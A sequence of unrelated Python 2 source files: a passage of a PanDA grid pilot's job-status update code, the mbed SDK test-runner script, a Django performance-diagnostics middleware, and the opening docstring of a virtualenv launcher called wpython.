if (job.result[0] == 'failed' or job.result[0] == 'finished') and not os.environ.has_key('Nordugrid_pilot'):
try:
os.system("rm -rf %s/%s" % (workdir, job.logFile))
except OSError:
tolog("!!WARNING!!1300!! Could not remove %s" % (job.logFile))
else:
tolog("Removed log file")
return node_xml
def updateOutputFilesXMLWithSURLs4NG(self, experiment, siteWorkdir, jobId, outputFilesXML):
""" Update the OutputFiles.xml file with SURLs """
status = False
# open and read back the OutputFiles.xml file
_filename = os.path.join(siteWorkdir, outputFilesXML)
if os.path.exists(_filename):
try:
f = open(_filename, "r")
except Exception, e:
tolog("!!WARNING!!1990!! Could not open file %s: %s" % (_filename, e))
else:
# get the metadata
xmlIN = f.read()
f.close()
# update the XML
xmlOUT = updateXMLWithSURLs(experiment, xmlIN, siteWorkdir, jobId, self.__jobrec, format='NG')
# write the XML
try:
f = open(_filename, "w")
except OSError, e:
tolog("!!WARNING!!1990!! Could not open file %s: %s" % (_filename, e))
else:
# write the XML and close the file
f.write(xmlOUT)
f.close()
tolog("Final XML for Nordugrid / CERNVM:\n%s" % (xmlOUT))
status = True
else:
tolog("!!WARNING!!1888!! Metadata file does not exist: %s" % (_filename))
return status
def getDateDirs(self):
""" Return a directory path based on the current date """
# E.g. 2014/09/22
year = date.today().strftime("%Y")
month = date.today().strftime("%m")
day = date.today().strftime("%d")
return "%s-%s-%s" % (year, month, day)
def tryint(self, x):
""" Used by numbered string comparison (to protect against unexpected letters in version number) """
try:
return int(x)
except ValueError:
return x
def splittedname(self, s):
""" Used by numbered string comparison """
# Can also be used for sorting:
# > names = ['YT4.11', '4.3', 'YT4.2', '4.10', 'PT2.19', 'PT2.9']
# > sorted(names, key=splittedname)
# ['4.3', '4.10', 'PT2.9', 'PT2.19', 'YT4.2', 'YT4.11']
from re import split
return tuple(self.tryint(x) for x in split('([0-9]+)', s))
def isAGreaterOrEqualToB(self, A, B):
""" Is numbered string A > B? """
# > a="1.2.3"
# > b="2.2.2"
# > e.isAGreaterThanB(a,b)
# False
return self.splittedname(A) >= self.splittedname(B)
def getPayloadMetadataFilename(self, workdir, jobId, altloc=""):
""" Return a proper path for the payload metadata """
filenamePayloadMetadata = ""
# Primarily use the jobReport.json if its' version is >= 1.0.0
_filename = os.path.join(workdir, "jobReport.json")
if not os.path.exists(_filename) and altloc != "":
_filename = os.path.join(altloc, "jobReport.json")
tolog("Trying alternative location: %s" % (_filename))
if os.path.exists(_filename):
# Now check the version
try:
f = open(_filename, 'r')
except Exception, e:
tolog("!!WARNING!!2233!! Could not open %s: %s" % (_filename, e))
else:
# Now verify that the version is at least 1.0.0
from json import load
try:
jobReport_dict = load(f)
version = jobReport_dict['reportVersion']
except Exception, e:
filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
tolog("reportVersion not found in jobReport, using default metadata XML file")
else:
v = '1.0.0'
if self.isAGreaterOrEqualToB(version, v):
tolog("Will send metadata file %s since version %s is >= %s" % (_filename, version, v))
filenamePayloadMetadata = _filename
else:
filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
tolog('Metadata version in file %s is too old (%s < %s), will send old XML file %s' % \
(os.path.basename(_filename), version, v, os.path.basename(filenamePayloadMetadata)))
else:
# Use default metadata file
tolog("Did not find %s" % (_filename))
filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
# Make sure the metadata file actually exists
if os.path.exists(filenamePayloadMetadata):
tolog("Verified existance of metadata file: %s" % (filenamePayloadMetadata))
else:
tolog("WARNING: metadata file does not exist: %s" % (filenamePayloadMetadata))
tolog("Looking for it in the pilot init dir..")
fname = os.path.basename(filenamePayloadMetadata)
path = os.path.join(self.__pilot_initdir, fname)
if os.path.exists(path):
filenamePayloadMetadata = path
tolog("Verified existance of metadata file: %s" % (filenamePayloadMetadata))
return filenamePayloadMetadata
def updatePandaServer(self, job, site, workerNode, port, xmlstr=None, spaceReport=False, log=None, ra=0, jr=False, useCoPilot=False, stdout_tail="", stdout_path="", additionalMetadata=None):
"""
Update the job status with the jobdispatcher web server.
State is a tuple of (jobId, ["jobstatus", transExitCode, pilotErrorCode], timestamp)
log = log extracts
xmlstr is set in postJobTask for finished jobs (all files). Failed jobs will only send xml for log (created in this function)
jr = job recovery mode
"""
tolog("Updating job status in updatePandaServer(): PandaId=%s, result=%s, time=%s" % (job.getState()))
# set any holding job to failed for sites that do not use job recovery (e.g. sites with LSF, that immediately
# removes any work directory after the LSF job finishes which of course makes job recovery impossible)
if not self.__jobrec:
if job.result[0] == 'holding' and site.sitename != "CERNVM":
job.result[0] = 'failed'
tolog("This site does not support job recovery: HOLDING state reset to FAILED")
# note: any changed job state above will be lost for fake server updates, does it matter?
# get the node structure expected by the server
node = self.getNodeStructure(job, site, workerNode, spaceReport=spaceReport, log=log)
# skip the server update (e.g. on NG)
if not self.__updateServer:
tolog("(fake server update)")
return 0, node
# get the xml
node['xml'] = self.getXML(job, site.sitename, site.workdir, xmlstr=xmlstr, jr=jr)
# stdout tail in case job.debug == 'true'
if job.debug and stdout_tail != "":
# protection for potentially large tails
stdout_tail = stdout_tail[-2048:]
node['stdout'] = stdout_tail
tolog("Will send stdout tail:\n%s (length = %d)" % (stdout_tail, len(stdout_tail)))
# also send the full stdout to a text indexer if required
if stdout_path != "":
if "stdout_to_text_indexer" in readpar('catchall') and os.path.exists(stdout_path):
tolog("Will send payload stdout to text indexer")
# get the user name, which we will use to create a proper filename
from SiteMover import SiteMover
s = SiteMover()
username = s.extractUsername(job.prodUserID)
# get setup path for xrdcp
try:
si = getSiteInformation(job.experiment)
setup_path = si.getLocalROOTSetup()
filename = "PanDA_payload_stdout-%s.txt" % (job.jobId)
dateDirs = self.getDateDirs()
remotePath = os.path.join(os.path.join(username, dateDirs), filename)
url = "root://faxbox.mwt2.org//group/logs/pilot/%s" % (remotePath)
cmd = "%sxrdcp -f %s %s" % (setup_path, stdout_path, url)
tolog("Executing command: %s" % (cmd))
rc, rs = getstatusoutput(cmd)
tolog("rc=%d, rs=%s" % (rc, rs))
except Exception, e:
tolog("!!WARNING!!3322!! Failed with text indexer: %s" % (e))
else:
tolog("stdout_path not set")
else:
if not job.debug:
tolog("Stdout tail will not be sent (debug=False)")
elif stdout_tail == "":
tolog("Stdout tail will not be sent (no stdout tail)")
else:
tolog("Stdout tail will not be sent (debug=%s, stdout_tail=\'%s\')" % (str(job.debug), stdout_tail))
# PN fake lostheartbeat
# if job.result[0] == "finished":
# node['state'] = "holding"
# node['xml'] = ""
# read back node['xml'] from jobState file for CERNVM
sendXML = True
if site.sitename == "CERNVM":
_node = self.getNodeStructureFromFile(site.workdir, job.jobId)
if _node:
if _node.has_key('xml'):
if _node['xml'] != "":
node['xml'] = _node['xml']
tolog("Read back metadata xml from job state file (length: %d)" % len(node['xml']))
else:
tolog("No metadata xml present in current job state file (1 - pilot should not send xml at this time)")
sendXML = False
else:
tolog("No xml key in node structure")
sendXML = False
else:
tolog("No metadata xml present in current job state file (2 - pilot should not send xml at this time)")
sendXML = False
# change the state to holding for initial CERNVM job
if not sendXML and (job.result[0] == "finished" or job.result[0] == "failed"):
# only set the holding state if the Co-Pilot is used
if useCoPilot:
job.result[0] = "holding"
node['state'] = "holding"
# update job state file
_retjs = updateJobState(job, site, node, recoveryAttempt=ra)
# is it the final update?
if job.result[0] == 'finished' or job.result[0] == 'failed' or job.result[0] == 'holding':
final = True
else:
final = False
# send the original xml/json if it exists (end of production job, ignore for event service job)
filenamePayloadMetadata = self.getPayloadMetadataFilename(site.workdir, job.jobId, altloc=job.workdir)
payloadXMLProblem = False
# backward compatibility
try:
eventService = job.eventService
except:
eventService = False
if os.path.exists(filenamePayloadMetadata) and final:
# get the metadata created by the payload
payloadXML = getMetadata(site.workdir, job.jobId, athena=True, altpath=filenamePayloadMetadata)
# add the metadata to the node
if payloadXML != "" and payloadXML != None:
tolog("Adding payload metadata of size %d to node dictionary (\'metaData\' field):\n%s" % (len(payloadXML), payloadXML))
node['metaData'] = payloadXML
else:
pilotErrorDiag = "Empty Athena metadata in file: %s" % (filenamePayloadMetadata)
payloadXMLProblem = True
else:
# athena XML should exist at the end of the job
analyJob = isAnalysisJob(job.trf.split(",")[0])
if job.result[0] == 'finished' and 'Install' not in site.sitename and not analyJob and 'DDM' not in site.sitename and 'test' not in site.sitename and job.prodSourceLabel != "install" and not eventService:
pilotErrorDiag = "Metadata does not exist: %s" % (filenamePayloadMetadata)
payloadXMLProblem = True
# fail the job if there was a problem with the athena metadata
# remove the comments below if a certain trf and release should be excluded from sending metadata
# trf_exclusions = ['merge_trf.py']
# release_exclusions = ['14.5.2.4']
# jobAtlasRelease = getAtlasRelease(job.release)
# if payloadXMLProblem and job.trf.split(",")[-1] not in trf_exclusions and jobAtlasRelease[-1] not in release_exclusions:
if payloadXMLProblem:
if job.trf == 'Archive_tf.py' or job.trf == 'Dummy_tf.py':
tolog("Metadata does not exist because the job is an archive/dummy job")
else:
tolog("!!FAILED!!1300!! %s" % (pilotErrorDiag))
job.result[0] = "failed"
job.result[2] = self.__error.ERR_NOPAYLOADMETADATA
if node.has_key('pilotLog'):
node['pilotLog'] += "!!FAILED!!1300!! %s" % (pilotErrorDiag)
else:
node['pilotLog'] = "!!FAILED!!1300!! %s" % (pilotErrorDiag)
node['pilotErrorCode'] = job.result[2]
node['state'] = job.result[0]
# for backward compatibility
try:
experiment = job.experiment
except:
experiment = "unknown"
# do not make the update if Nordugrid (leave for ARC to do)
if os.environ.has_key('Nordugrid_pilot'):
if final:
# update xml with SURLs stored in special SURL dictionary file
if self.updateOutputFilesXMLWithSURLs4NG(experiment, site.workdir, job.jobId, job.outputFilesXML):
tolog("Successfully added SURLs to %s" % (job.outputFilesXML))
# update xml with SURLs stored in special SURL dictionary file
if node.has_key('xml'):
tolog("Updating node structure XML with SURLs")
node['xml'] = updateXMLWithSURLs(experiment, node['xml'], site.workdir, job.jobId, self.__jobrec) # do not use format 'NG' here
# was the log file transferred to an OS? check in the OS transfer dictionary
tolog("job.logBucketID: %s" % job.logBucketID)
if job.logBucketID != -1:
# get the corresponding ddm endpoint
si = getSiteInformation(experiment)
os_ddmendpoint = si.getObjectstoreDDMEndpointFromBucketID(job.logBucketID)
node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [os_ddmendpoint])
else:
node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [None])
tolog("Updated XML:\n%s" % (node['xml']))
else:
tolog("WARNING: Found no xml entry in the node structure")
# store final node structure in pilot_initdir (will be sent to server by ARC control tower)
self.copyNodeStruct4NG(node)
tolog("Leaving the final update for the control tower")
return 0, node
# do not send xml if there was a put error during the log transfer
_xml = None
if final and node.has_key('xml'):
# is the call to updateXMLWithSURLs() useless? already done in JobLog?
# update xml with SURLs stored in special SURL dictionary file
tolog("Updating node structure XML with SURLs")
node['xml'] = updateXMLWithSURLs(experiment, node['xml'], site.workdir, job.jobId, self.__jobrec)
# was the log file transferred to an OS? check in the OS transfer dictionary
tolog("job.logBucketID: %s" % job.logBucketID)
if job.logBucketID != -1:
# get the corresponding ddm endpoint
si = getSiteInformation(experiment)
os_ddmendpoint = si.getObjectstoreDDMEndpointFromBucketID(job.logBucketID)
node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [os_ddmendpoint])
else:
node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [None])
tolog("Updated XML:\n%s" % (node['xml']))
_xml = node['xml']
if not isLogfileCopied(site.workdir, job.jobId):
tolog("Pilot will not send xml about output files since log was not transferred")
node['xml'] = ""
# should XML be sent at this time?
if not sendXML:
tolog("Metadata xml will not be sent")
if node.has_key('xml'):
if node['xml'] != "":
_xml = node['xml']
node['xml'] = ""
# add experiment specific metadata
if final and additionalMetadata != None:
tolog("Adding additionalMetadata to node")
if 'metaData' in node:
node['metaData'] += additionalMetadata
else:
node['metaData'] = additionalMetadata
# make the PandaLogger update at the final job update
if final:
# do not send FAX info for overflow jobs (transferType=fax), only for failover jobs
if job.filesWithFAX > 0 and job.transferType.lower() != "fax":
tolog("Sending PandaLogger update")
params = {}
params['pid'] = job.jobId
params['line'] = 0 # this is mandatory part of API, has to be present
params['type'] = 'FAXrecovery'
params['message'] = '"WithFAX":' + str(job.filesWithFAX) +\
',"WithoutFAX":' + str(job.filesWithoutFAX) +\
',"bytesWithFAX":' + str(job.bytesWithFAX) +\
',"bytesWithoutFAX":' + str(job.bytesWithoutFAX) +\
',"timeToCopy":' + job.timeStageIn
toPandaLogger(params)
# make the actual update, repeatedly if necessary (for the final update)
#ret = makeHTTPUpdate(job.result[0], node, port, url=self.__pshttpurl, path=self.__pilot_initdir)
if job.workdir.endswith("/"):
job.workdir = job.workdir[:-1]
ret = makeHTTPUpdate(job.result[0], node, port, url=self.__pshttpurl, path=os.path.dirname(job.workdir))
if not ret[2]: # data is None for a failed update attempt
tolog("makeHTTPUpdate returned: %s" % str(ret))
return 1, None
tolog("ret = %s" % str(ret))
data = ret[1]
tolog("data = %s" % str(data))
if data.has_key("command"):
job.action = data['command']
try:
awk = data['StatusCode']
except:
tolog("!!WARNING!!1300!! Having problem updating job status, set the awk to 1 for now, and continue...")
awk = "1"
else:
tolog("jobDispatcher acknowledged with %s" % (awk))
# need to have a return code so subprocess knows if update goes ok or not
ecode = int(awk) # use the awk code from jobdispatcher as the exit code
# PN fake lostheartbeat
# if job.result[0] == "finished":
# ecode = 1
# reset xml in case it was overwritten above for failed log transfers
if final and node.has_key('xml'):
node['xml'] = _xml
# if final update, now it's safe to remove any lingering memory output files from the init dir
if final:
try:
filename = os.path.join(self.__pilot_initdir, "memory_monitor*")
tolog("Will remove any lingering %s files from the init directory" % (filename))
os.system("rm -rf %s" % (filename))
except Exception, e:
tolog("!!WARNING!!4343!! Failed to remove %s: %s" % (filename), e)
return ecode, node # ecode=0 : update OK, otherwise something wrong
| |
#!/usr/bin/env python2
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.Wirkus@arm.com>
"""
"""
File format example: test_spec.json:
{
"targets": {
"KL46Z": ["ARM", "GCC_ARM"],
"LPC1768": ["ARM", "GCC_ARM", "GCC_CR", "GCC_CS", "IAR"],
"LPC11U24": ["uARM"],
"NRF51822": ["ARM"]
}
}
File format example: muts_all.json:
{
"1" : {"mcu": "LPC1768",
"port":"COM4",
"disk":"J:\\",
"peripherals": ["TMP102", "digital_loop", "port_loop", "analog_loop", "SD"]
},
"2" : {"mcu": "KL25Z",
"port":"COM7",
"disk":"G:\\",
"peripherals": ["digital_loop", "port_loop", "analog_loop"]
}
}
"""
# Be sure that the tools directory is in the search path
import sys
from os.path import join, abspath, dirname
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
# Check: Extra modules which are required by core test suite
from workspace_tools.utils import check_required_modules
check_required_modules(['prettytable', 'serial'])
# Imports related to mbed build api
from workspace_tools.build_api import mcu_toolchain_matrix
# Imports from TEST API
from workspace_tools.test_api import SingleTestRunner
from workspace_tools.test_api import singletest_in_cli_mode
from workspace_tools.test_api import detect_database_verbose
from workspace_tools.test_api import get_json_data_from_file
from workspace_tools.test_api import get_avail_tests_summary_table
from workspace_tools.test_api import get_default_test_options_parser
from workspace_tools.test_api import print_muts_configuration_from_json
from workspace_tools.test_api import print_test_configuration_from_json
from workspace_tools.test_api import get_autodetected_MUTS_list
from workspace_tools.test_api import get_autodetected_TEST_SPEC
from workspace_tools.test_api import get_module_avail
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
# Importing extra modules which can be not installed but if available they can extend test suite functionality
try:
import mbed_lstools
from workspace_tools.compliance.ioper_runner import IOperTestRunner
from workspace_tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
def get_version():
""" Returns test script version
"""
single_test_version_major = 1
single_test_version_minor = 5
return (single_test_version_major, single_test_version_minor)
if __name__ == '__main__':
# Command line options
parser = get_default_test_options_parser()
parser.description = """This script allows you to run mbed defined test cases for particular MCU(s) and corresponding toolchain(s)."""
parser.epilog = """Example: singletest.py -i test_spec.json -M muts_all.json"""
(opts, args) = parser.parse_args()
# Print scrip version
if opts.version:
print parser.description
print parser.epilog
print "Version %d.%d"% get_version()
exit(0)
if opts.db_url and opts.verbose_test_configuration_only:
detect_database_verbose(opts.db_url)
exit(0)
# Print summary / information about automation test status
if opts.test_automation_report:
print get_avail_tests_summary_table(platform_filter=opts.general_filter_regex)
exit(0)
# Print summary / information about automation test status
if opts.test_case_report:
test_case_report_cols = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration',
'source_dir']
print get_avail_tests_summary_table(cols=test_case_report_cols,
result_summary=False,
join_delim='\n',
platform_filter=opts.general_filter_regex)
exit(0)
# Only prints matrix of supported toolchains
if opts.supported_toolchains:
print mcu_toolchain_matrix(platform_filter=opts.general_filter_regex)
exit(0)
test_spec = None
MUTs = None
if hasattr(opts, 'auto_detect') and opts.auto_detect:
# If auto_detect attribute is present, we assume other auto-detection
# parameters like 'toolchains_filter' are also set.
print "MBEDLS: Detecting connected mbed-enabled devices... "
MUTs = get_autodetected_MUTS_list()
for mut in MUTs.values():
print "MBEDLS: Detected %s, port: %s, mounted: %s"% (mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu'],
mut['port'],
mut['disk'])
# Set up parameters for test specification filter function (we need to set toolchains per target here)
use_default_toolchain = 'default' in opts.toolchains_filter.split(',') if opts.toolchains_filter is not None else True
use_supported_toolchains = 'all' in opts.toolchains_filter.split(',') if opts.toolchains_filter is not None else False
toolchain_filter = opts.toolchains_filter
platform_name_filter = opts.general_filter_regex.split(',') if opts.general_filter_regex is not None else opts.general_filter_regex
# Test specification with information about each target and associated toolchain
test_spec = get_autodetected_TEST_SPEC(MUTs.values(),
use_default_toolchain=use_default_toolchain,
use_supported_toolchains=use_supported_toolchains,
toolchain_filter=toolchain_filter,
platform_name_filter=platform_name_filter)
else:
# Open file with test specification
# test_spec_filename tells script which targets and their toolchain(s)
# should be covered by the test scenario
test_spec = get_json_data_from_file(opts.test_spec_filename) if opts.test_spec_filename else None
if test_spec is None:
if not opts.test_spec_filename:
parser.print_help()
exit(-1)
# Get extra MUTs if applicable
MUTs = get_json_data_from_file(opts.muts_spec_filename) if opts.muts_spec_filename else None
if MUTs is None:
if not opts.muts_spec_filename:
parser.print_help()
exit(-1)
if opts.verbose_test_configuration_only:
print "MUTs configuration in %s:" % ('auto-detected' if opts.auto_detect else opts.muts_spec_filename)
if MUTs:
print print_muts_configuration_from_json(MUTs, platform_filter=opts.general_filter_regex)
print
print "Test specification in %s:" % ('auto-detected' if opts.auto_detect else opts.test_spec_filename)
if test_spec:
print print_test_configuration_from_json(test_spec)
exit(0)
if get_module_avail('mbed_lstools'):
if opts.operability_checks:
# Check if test scope is valid and run tests
test_scope = get_available_oper_test_scopes()
if opts.operability_checks in test_scope:
tests = IOperTestRunner(scope=opts.operability_checks)
test_results = tests.run()
# Export results in form of JUnit XML report to separate file
if opts.report_junit_file_name:
report_exporter = ReportExporter(ResultExporterType.JUNIT_OPER)
report_exporter.report_to_file(test_results, opts.report_junit_file_name)
else:
print "Unknown interoperability test scope name: '%s'" % (opts.operability_checks)
print "Available test scopes: %s" % (','.join(["'%s'" % n for n in test_scope]))
exit(0)
# Verbose test specification and MUTs configuration
if MUTs and opts.verbose:
print print_muts_configuration_from_json(MUTs)
if test_spec and opts.verbose:
print print_test_configuration_from_json(test_spec)
if opts.only_build_tests:
# We are skipping testing phase, and suppress summary
opts.suppress_summary = True
single_test = SingleTestRunner(_global_loops_count=opts.test_global_loops_value,
_test_loops_list=opts.test_loops_list,
_muts=MUTs,
_clean=opts.clean,
_opts_db_url=opts.db_url,
_opts_log_file_name=opts.log_file_name,
_opts_report_html_file_name=opts.report_html_file_name,
_opts_report_junit_file_name=opts.report_junit_file_name,
_opts_report_build_file_name=opts.report_build_file_name,
_test_spec=test_spec,
_opts_goanna_for_mbed_sdk=opts.goanna_for_mbed_sdk,
_opts_goanna_for_tests=opts.goanna_for_tests,
_opts_shuffle_test_order=opts.shuffle_test_order,
_opts_shuffle_test_seed=opts.shuffle_test_seed,
_opts_test_by_names=opts.test_by_names,
_opts_peripheral_by_names=opts.peripheral_by_names,
_opts_test_only_peripheral=opts.test_only_peripheral,
_opts_test_only_common=opts.test_only_common,
_opts_verbose_skipped_tests=opts.verbose_skipped_tests,
_opts_verbose_test_result_only=opts.verbose_test_result_only,
_opts_verbose=opts.verbose,
_opts_firmware_global_name=opts.firmware_global_name,
_opts_only_build_tests=opts.only_build_tests,
_opts_parallel_test_exec=opts.parallel_test_exec,
_opts_suppress_summary=opts.suppress_summary,
_opts_test_x_toolchain_summary=opts.test_x_toolchain_summary,
_opts_copy_method=opts.copy_method,
_opts_mut_reset_type=opts.mut_reset_type,
_opts_jobs=opts.jobs,
_opts_waterfall_test=opts.waterfall_test,
_opts_consolidate_waterfall_test=opts.consolidate_waterfall_test,
_opts_extend_test_timeout=opts.extend_test_timeout,
_opts_auto_detect=opts.auto_detect)
# Runs test suite in CLI mode
if (singletest_in_cli_mode(single_test)):
exit(0)
else:
exit(-1)
| |
import sys
import os, socket, threading
import datetime, random, math
import thread
from functools import wraps
import dogslow
from celery import shared_task
from django.utils import timezone
from django.conf import settings
from django.db import models
from django.http import HttpResponse
try:
SETTINGS = settings.DIAGNOSTICS_SETTINGS
except:
SETTINGS = {
'USE_CELERY': False,
'MIDDLEWARE_SAMPLE_RATE': 0.05,
'MIDDLEWARE_SLOW': 200.0,
'MIDDLEWARE_EXCLUDED_PATHS': ('/ping.html', '/admin/'),
'MIDDLEWARE_EXCLUDED_TYPES': ('.php',),
'LOG_LEVEL': 0,
'SAMPLE_RATE': 0.05,
'DOGSLOW': True,
}
class Diagnostic(models.Model):
slow_log = models.BooleanField(default=False, db_index=True)
middleware = models.BooleanField(default=False, db_index=True)
event = models.CharField(max_length=200, blank=True, default="", db_index=True)
sub_event = models.CharField(max_length=2000, blank=True, default="")
host = models.CharField(max_length=20, null=True, blank=True, db_index=True) # host IP address
elapsed_time = models.FloatField(default=0, db_index=True) # total time elapsed in ms
cpu_time = models.FloatField(default=0) # CPU time used by this process in ms
cpu_percent = models.FloatField(default=0, null=True) # overall CPU usage during this request
process_id = models.IntegerField(default=0, db_index=True)
thread_id = models.CharField(max_length=50, blank=True, default="", db_index=True)
timestamp = models.DateTimeField(auto_now_add=True)
extra = models.TextField(blank=True, default="") # other miscellaneous information
def save(self, *args, **kwargs):
super(Diagnostic, self).save(*args, **kwargs)
def set_machine_info(self):
pid, tid, host = Diagnostic.current_machine_info()
if not self.process_id:
self.process_id = pid
if not self.thread_id:
self.thread_id = tid
if not self.host:
self.host = host
@staticmethod
def current_machine_info():
return os.getpid(), str(threading.current_thread().ident), socket.gethostbyname(socket.gethostname())
@shared_task
def save_diagnostic(diagnostic):
diagnostic.save()
class DiagnosticMiddleware(object):
def __init__(self):
if SETTINGS.get('DOGSLOW', True):
self.interval = SETTINGS.get('MIDDLEWARE_SLOW', 25000) / 1000.0
self.timer = dogslow.timer.Timer()
self.timer.daemon = True
self.timer.start()
@staticmethod
def req_string(request):
rs = '%s %s://%s%s' % (
request.META.get('REQUEST_METHOD'),
request.META.get('wsgi.url_scheme', 'http'),
request.META.get('HTTP_HOST'),
request.META.get('PATH_INFO'),
)
if request.META.get('QUERY_STRING', ''):
rs += ('?' + request.META.get('QUERY_STRING'))
return rs
@staticmethod
def peek(request, thread_id, started, event=None, sub_event=None):
""" HT Dogslow """
frame = sys._current_frames()[thread_id]
header_string = event
if hasattr(request, 'META'):
header_string = DiagnosticMiddleware.req_string(request)
event = request.META.get('PATH_INFO')
sub_event = str(request.REQUEST)[:2000]
output = dogslow.WatchdogMiddleware._compose_output(
frame, header_string, started, thread_id)
response_time = timezone.now() - request.start_time
response_time_millis = response_time.seconds*1000 + response_time.microseconds/1000.0
diagnostic = Diagnostic(
event=event,
extra=output,
sub_event=event,
slow_log=True,
elapsed_time=response_time_millis,
middleware=True,
)
diagnostic.set_machine_info()
diagnostic.save()
def _is_excluded(self, request):
""" Returns true if the path or filetype is on the list of excluded files"""
if any(request.META.get('PATH_INFO').endswith(ending) for
ending in SETTINGS['MIDDLEWARE_EXCLUDED_TYPES']):
return True
elif any (request.META.get('PATH_INFO').startswith(path) for
path in SETTINGS['MIDDLEWARE_EXCLUDED_PATHS']):
return True
def _cancel(self, request):
if hasattr(request, 'dogslow'):
self.timer.cancel(request.dogslow)
del request.dogslow
def process_request(self, request):
if self._is_excluded(request):
return
request.dogslow = self.timer.run_later(
DiagnosticMiddleware.peek,
self.interval,
request,
thread.get_ident(),
datetime.datetime.utcnow())
request.start_time = timezone.now()
request.cpu_start_time = os.times()[0]
try:
usage = open('/proc/stat', 'r')
request.stat_start_values = usage.readline().split(' ')
except:
request.stat_start_values = None
def process_view(self, request, view_func, view_args, view_kwargs):
request.view_func_name = view_func.__name__
def process_template_response(self, request, response):
return response
def process_response(self, request, response):
self._cancel(request)
if self._is_excluded(request):
return response
random_sample = (random.random() <= SETTINGS.get('MIDDLEWARE_SAMPLE_RATE', 1.0))
if random_sample:
response_time = timezone.now() - request.start_time
response_time_millis = response_time.seconds*1000 + response_time.microseconds/1000.0
cpu_time = (os.times()[0] - request.cpu_start_time) * 1000.0
try:
usage = open('/proc/stat', 'r')
cur_usage = usage.readline().split(' ')
usage_time = 0.0
for index in [2,3,4]:
usage_time += (int(cur_usage[index]) - int(request.stat_start_values[index]))
idle_time = int(cur_usage[5]) - int(request.stat_start_values[5])
if (usage_time + idle_time) > 0:
cpu_percent = float(usage_time)/float(usage_time + idle_time)
else:
cpu_percent = -1.0
except:
cpu_percent = 0.0
diagnostic = Diagnostic(
event = request.META.get('PATH_INFO'),
elapsed_time=response_time_millis,
cpu_time=cpu_time,
cpu_percent=cpu_percent,
sub_event=str(request.REQUEST)[:2000],
slow_log = False,
middleware=True,
)
diagnostic.set_machine_info()
if hasattr(request, 'view_func_name'):
diagnostic.extra = request.view_func_name
if SETTINGS.get('USE_CELERY', False):
save_diagnostic.delay(diagnostic)
else:
diagnostic.save()
return response
def process_exception(self, request, exception):
self._cancel(request)
@shared_task
def log_diagnostic(event="", sub_event="", elapsed_timedelta=None, host="", process_id="", thread_id="",
extra="", log_level=1, force=False):
"""
creates and saves a diagnostic record with the given info, and
returns the time this was done which can be used for future logs
"""
if force or (
(log_level >= SETTINGS['LOG_LEVEL']) and
(random.random() <= SETTINGS['SAMPLE_RATE'])):
diagnostic = Diagnostic(
event=event,
sub_event=sub_event,
host=host,
process_id=process_id,
thread_id=thread_id,
extra=extra,
elapsed_time=(elapsed_timedelta.microseconds/1000.0 + elapsed_timedelta.seconds*1000.0),
)
diagnostic.set_machine_info()
if SETTINGS['USE_CELERY']:
save_diagnostic.delay(diagnostic)
else:
diagnostic.save()
return timezone.now()
def performance_log(log_level=1, slow_time=None, force=False):
def performance_log_decorator(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
f.start_time = timezone.now()
if force or (log_level > SETTINGS.get('LOG_LEVEL', 1)):
interval = slow_time if slow_time else SETTINGS.get('MIDDLEWARE_SLOW', 25000) / 1000.0
dogslow = performance_log.timer.run_later(
DiagnosticMiddleware.peek,
interval,
f,
thread.get_ident(),
datetime.datetime.utcnow(),
f.__module__,
f.__name__,)
ret_val = f(*args, **kwargs)
do_log = force
if not do_log:
do_log = ((log_level >= SETTINGS.get('LOG_LEVEL', 1.0)) and
random.random() <= SETTINGS.get('SAMPLE_RATE', 1.0))
if do_log:
elapsed_timedelta = timezone.now()-f.start_time
log_diagnostic(
event=f.__module__,
sub_event=f.__name__,
elapsed_timedelta=elapsed_timedelta,
log_level=log_level,
force=True,
)
return ret_val
return wrapped_f
return performance_log_decorator
performance_log.timer = dogslow.timer.Timer()
performance_log.timer.daemon = True
performance_log.timer.start()
| |
#!/usr/bin/env python
# encoding: utf-8
"""
wpython.py
==========
__ __
.--.--.--.-----.--.--| |_| |--.-----.-----.
| | | | _ | | | _| | _ | |
|________| __|___ |____|__|__|_____|__|__|
|__| |_____|
With wpython you can launch scripts residing in virtual environments
without the need of activating the venv.
When you want to execute a script in a venv, what do you usually do?
Activate the venv, execute the script, deactivate the venv. But what if
you want to call a venv'ed script in batch mode from another script?
Each venv has its own Python interpreter. When you execute a script in the
venv, this Python interpreter is used to run the script. If you don't
want to activate the venv, then you need to provide the path of this
Python interpreter. Example:
/path/to/venv/bin/python /path/to/script.py
wpython reduces it to:
wpython /path/to/script.py
wpython figures out the path of the Python interpreter in the venv
and passes /path/to/script.py to this local interpreter.
Requirements
------------
wpython relies on the excellent unipath library, which provides a sane
way to work with files and directories.
It comes bundled with wpython or you can install it system-wide.
Tested with
-----------
It was tested under Linux with Python 2 and Python 3.
Usage
-----
1) Put wpython.py somewhere in your PATH.
Tip: I put two symbolic links on it: wpython and wpy.
2) In the root of your venv'ed project directory create a file called ".venv".
The content of this file should be the path of the directory
where the virtual env. is created by the commands virtualenv or
virtualenvwrapper.
This path can be either absolute or relative.
You can also rename ".venv", see the VENV_FILE constant in the source below.
virtualenvwrapper example
-------------------------
Say we have our project directory here: `/home/jabba/python/wpython_demo`.
In this folder launch this command:
mkvirtualenv wpython_demo
It creates the virtual environment here: `/home/jabba/.virtualenvs/wpython_demo.`
